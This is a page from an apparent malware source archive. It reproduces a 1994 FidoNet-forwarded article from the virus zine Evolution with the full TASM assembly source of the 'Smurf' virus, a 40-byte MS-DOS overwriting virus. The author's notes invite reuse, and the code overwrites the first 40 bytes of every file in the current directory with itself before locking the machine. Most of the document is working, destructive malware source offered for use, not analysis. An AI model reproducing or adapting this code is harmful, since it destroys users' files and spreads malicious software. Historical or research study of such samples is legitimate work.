MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.vir10.asm
2021-01-12 18:04:54 -06:00

101 lines
4.0 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 1 of 55
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:10
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : OW_40.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Ron Toler, 2:283/718 (06 Nov 94 16:13)
;* To : Doug Bryce
;* Subj : OW_40.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
;ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92
;
;Article Title: The Smurf Virus
;Author: Admiral Bailey
;---
; The Smurf virus [40 Bytes Long]
;
; Author : Admiral Bailey [YAM '92]
; Date : June 6 1992
; Language : Assembly [TASM 2.0]
;
; Notes:The Smurf virus was my first attempt at writing the smallest
; overwriting virus known. For a first attempt it wasn't that
; bad. So far I have got it down to 40 bytes. The record that
; does the same as this is about 38 bytes. So I gotta loose 2
; bytes in here somewhere. Well seeing as this small thing is
; probably the easiest virus in the world to disassemble, I have
; included the source in this issue of Evolution for all of you
; to take a look at. The source is for you to use. If you
; happend to make anything smaller using this source please just
; give recognition to myself, Admiral Bailey, saying that you got
; help looking at this source. The only thing that this does is
; find everyfile in the current directory and overwrite the 1st
; 40 bytes with itself. Then locks your computer while it is in
; a search loop looking for more file when there are none. A
; neat thing about this is that it displays its entire self to
; the screen when executed. Scan 91 notices this as the mini
; virus but I dont blame it seeing that you cant realy avoid
; scan when your virus gets this small. Well enjoy the source...
; and remember if you use it and enjoy it just let me know.
;---
code segment
assume ds:code, ss:code, cs:code, es:code
org 100h ;Make it a .com file
virus_start equ $
start:
mov dx,offset file_type ;type of file to look for
mov ah,4eh ;Find first file command
infect:
int 21h
mov ax,3d02h ;open again to reset handle
mov dx,80h+1eh ;moves filename into dx
int 21h
mov bx,ax ;save handle again
mov cx,virus_length ;put size of virus in cx
mov dx,100h ;where the code starts
mov ah,40h ;write to handle command
int 21h ;write virus into file
mov ah,3eh ;close handle service
int 21h ;do it
find_next_file:
mov ah,4fh ;find next file command
jmp infect
file_type db '*.*',0
virus_end equ $
virus_length = virus_end - virus_start ;length of virus
code ends
end start
;-+- GoldED 2.50.B1016+
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/yx Extended memory swapping
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)